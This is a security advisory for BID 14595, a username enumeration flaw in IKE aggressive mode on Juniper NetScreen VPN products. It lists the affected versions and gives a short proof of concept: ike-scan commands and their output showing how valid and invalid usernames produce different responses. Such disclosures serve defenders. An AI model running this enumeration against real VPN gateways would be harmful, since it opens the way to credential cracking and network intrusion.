Juniper Netscreen VPN Username Enumeration Vulnerability

BID:14595

Info

Juniper Netscreen VPN Username Enumeration Vulnerability

Bugtraq ID: 14595
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Aug 18 2005 12:00AM
Updated: Aug 18 2005 12:00AM
Credit: Discovered by Roy Hills <[email protected]>.
Vulnerable: NetScreen ScreenOS 5.1 .0r3a
NetScreen ScreenOS 5.0
NetScreen ScreenOS 4.0.3 r4
NetScreen ScreenOS 4.0.3 r3
NetScreen ScreenOS 4.0.3 r2
NetScreen ScreenOS 4.0.3 r1
NetScreen ScreenOS 4.0.3
NetScreen ScreenOS 4.0.2
NetScreen ScreenOS 4.0.1 r9
NetScreen ScreenOS 4.0.1 r8
NetScreen ScreenOS 4.0.1 r7
NetScreen ScreenOS 4.0.1 r6
NetScreen ScreenOS 4.0.1 r5
NetScreen ScreenOS 4.0.1 r4
NetScreen ScreenOS 4.0.1 r3
NetScreen ScreenOS 4.0.1 r2
NetScreen ScreenOS 4.0.1 r10
NetScreen ScreenOS 4.0.1 r1
NetScreen ScreenOS 4.0.1
NetScreen ScreenOS 4.0 r9
NetScreen ScreenOS 4.0 r8
NetScreen ScreenOS 4.0 r7
NetScreen ScreenOS 4.0 r6
NetScreen ScreenOS 4.0 r5
NetScreen ScreenOS 4.0 r4
NetScreen ScreenOS 4.0 r3
NetScreen ScreenOS 4.0 r2
NetScreen ScreenOS 4.0 r12
NetScreen ScreenOS 4.0 r11
NetScreen ScreenOS 4.0 r10
NetScreen ScreenOS 4.0 r1
NetScreen ScreenOS 4.0 -DIAL
NetScreen ScreenOS 4.0
NetScreen ScreenOS 3.1.1 r2
NetScreen ScreenOS 3.1 r9
NetScreen ScreenOS 3.1 r8
NetScreen ScreenOS 3.1 r7
NetScreen ScreenOS 3.1 r6
NetScreen ScreenOS 3.1 r5
NetScreen ScreenOS 3.1 r4
NetScreen ScreenOS 3.1 r3
NetScreen ScreenOS 3.1 r2
NetScreen ScreenOS 3.1 r12
NetScreen ScreenOS 3.1 r11
NetScreen ScreenOS 3.1 r10
NetScreen ScreenOS 3.1 r1
NetScreen ScreenOS 3.1
NetScreen ScreenOS 3.0.3 r8
NetScreen ScreenOS 3.0.3 r7
NetScreen ScreenOS 3.0.3 r6
NetScreen ScreenOS 3.0.3 r5
NetScreen ScreenOS 3.0.3 r4
NetScreen ScreenOS 3.0.3 r3
NetScreen ScreenOS 3.0.3 r2
NetScreen ScreenOS 3.0.3 r1.1
NetScreen ScreenOS 3.0.3 r1
NetScreen ScreenOS 3.0.3
NetScreen ScreenOS 3.0.2
NetScreen ScreenOS 3.0.1 r7
NetScreen ScreenOS 3.0.1 r6
NetScreen ScreenOS 3.0.1 r5
NetScreen ScreenOS 3.0.1 r4
NetScreen ScreenOS 3.0.1 r3
NetScreen ScreenOS 3.0.1 r2
NetScreen ScreenOS 3.0.1 r1
NetScreen ScreenOS 3.0.1
NetScreen ScreenOS 3.0 r4
NetScreen ScreenOS 3.0 r3
NetScreen ScreenOS 3.0 r2
NetScreen ScreenOS 3.0 r1
NetScreen ScreenOS 3.0
NetScreen ScreenOS 2.10 r4
NetScreen ScreenOS 2.10 r3
NetScreen ScreenOS 2.8 r1
NetScreen ScreenOS 2.8
NetScreen ScreenOS 2.7.1 r3
NetScreen ScreenOS 2.7.1 r2
NetScreen ScreenOS 2.7.1 r1
NetScreen ScreenOS 2.7.1
NetScreen ScreenOS 2.6.1 r9
NetScreen ScreenOS 2.6.1 r8
NetScreen ScreenOS 2.6.1 r7
NetScreen ScreenOS 2.6.1 r6
NetScreen ScreenOS 2.6.1 r5
NetScreen ScreenOS 2.6.1 r4
NetScreen ScreenOS 2.6.1 r3
NetScreen ScreenOS 2.6.1 r2
NetScreen ScreenOS 2.6.1 r12
NetScreen ScreenOS 2.6.1 r11
NetScreen ScreenOS 2.6.1 r10
NetScreen ScreenOS 2.6.1 r1
NetScreen ScreenOS 2.6.1
NetScreen ScreenOS 2.6
NetScreen ScreenOS 2.5 r6
NetScreen ScreenOS 2.5 r2
NetScreen ScreenOS 2.5 r1
NetScreen ScreenOS 2.5
NetScreen ScreenOS 2.1 r7
NetScreen ScreenOS 2.1 r6
NetScreen ScreenOS 2.1
NetScreen ScreenOS 2.0.1 r8
NetScreen ScreenOS 1.73 r2
NetScreen ScreenOS 1.73 r1
NetScreen ScreenOS 1.66 r2
NetScreen ScreenOS 1.66
NetScreen ScreenOS 1.64
NetScreen ScreenOS 1.7
NetScreen NS-50NS25 5.0 .0r6.0
NetScreen NS-500 [Version 4110(0)-(11)] 5.1 .0r3a
NetScreen NS-500 [Version 4110(0)-(11)] 4.0 r10.0
NetScreen NS-204 [Version 0110(0)-(11)] 5.1 .0r3a
NetScreen NS-204 [Version 0110(0)-(11)] 4.0 r10.0
NetScreen NS-204 5.0 .0r6.0
NetScreen NS-100 3.0 .pe1.0
NetScreen NS-10
NetScreen NetScreen-SA 5050 Series 4.2 .r.2.2
NetScreen NetScreen-SA 5020 Series 4.2 .r.2.2
NetScreen NetScreen-SA 5000 Series
NetScreen Instant Virtual Extranet 3.3.1
NetScreen Instant Virtual Extranet 3.3
NetScreen Instant Virtual Extranet 3.2
NetScreen Instant Virtual Extranet 3.1
NetScreen Instant Virtual Extranet 3.0
Juniper screenos 5.1
Juniper screenos 5.2.0
Juniper NetScreen-IDP 500 3.0.1 r1
Juniper NetScreen-IDP 500 3.0 r2
Juniper NetScreen-IDP 500 3.0 r1
Juniper NetScreen-IDP 500 3.0
Juniper NetScreen-IDP 1000 3.0.1 r1
Juniper NetScreen-IDP 1000 3.0 r2
Juniper NetScreen-IDP 1000 3.0 r1
Juniper NetScreen-IDP 1000 3.0
Juniper NetScreen-IDP 100 3.0.1 r1
Juniper NetScreen-IDP 100 3.0 r2
Juniper NetScreen-IDP 100 3.0 r1
Juniper NetScreen-IDP 100 3.0
Juniper NetScreen-IDP 10 3.0.1 r1
Juniper NetScreen-IDP 10 3.0 r2
Juniper NetScreen-IDP 10 3.0 r1
Juniper NetScreen-IDP 10 3.0
Juniper NetScreen-5GT 5.0
Juniper NetScreen-5GT 5.0
Not Vulnerable:

Discussion

Juniper Netscreen VPN Username Enumeration Vulnerability

The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode, when pre-shared key authentication is used. This allows for attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network.

Exploit / POC

Juniper Netscreen VPN Username Enumeration Vulnerability

The ike-scan tool from NTA Monitor may be used to reproduce this attack. The following example, depicting the response to both a valid and invalid username respectively, is from the original post describing this issue:

The ike-scan options used in this example are:

-A Specify IKE Aggressive Mode. The default for ike-scan is
Main Mode.

-M Multiline: Display each payload on a separate line, which
makes the output easier to read.

--id=string Specify the string to be used for the ID payload.

10.0.0.1 The IP address of the target Netscreen.

3.1. Response to valid username "[email protected]"

$ ike-scan -A -M [email protected] 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
10.0.0.1 Aggressive Mode Handshake returned
HDR=(CKY-R=21af4dbe2cecd5f0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds
LifeDuration=28800)
VID=64405f46f03b7660a23be116a1975058e69e83870000000400000403
(Netscreen-05)
VID=4865617274426561745f4e6f74696679386b0100 (Heartbeat Notify)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=10.0.0.1)
Hash(20 bytes)

Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1
returned handshake; 0 returned notify

3.2. Response to invalid username "[email protected]"

$ ike-scan -A -M [email protected] 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)

Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0
returned handshake; 0 returned notify

Solution / Fix

Juniper Netscreen VPN Username Enumeration Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Juniper Netscreen VPN Username Enumeration Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report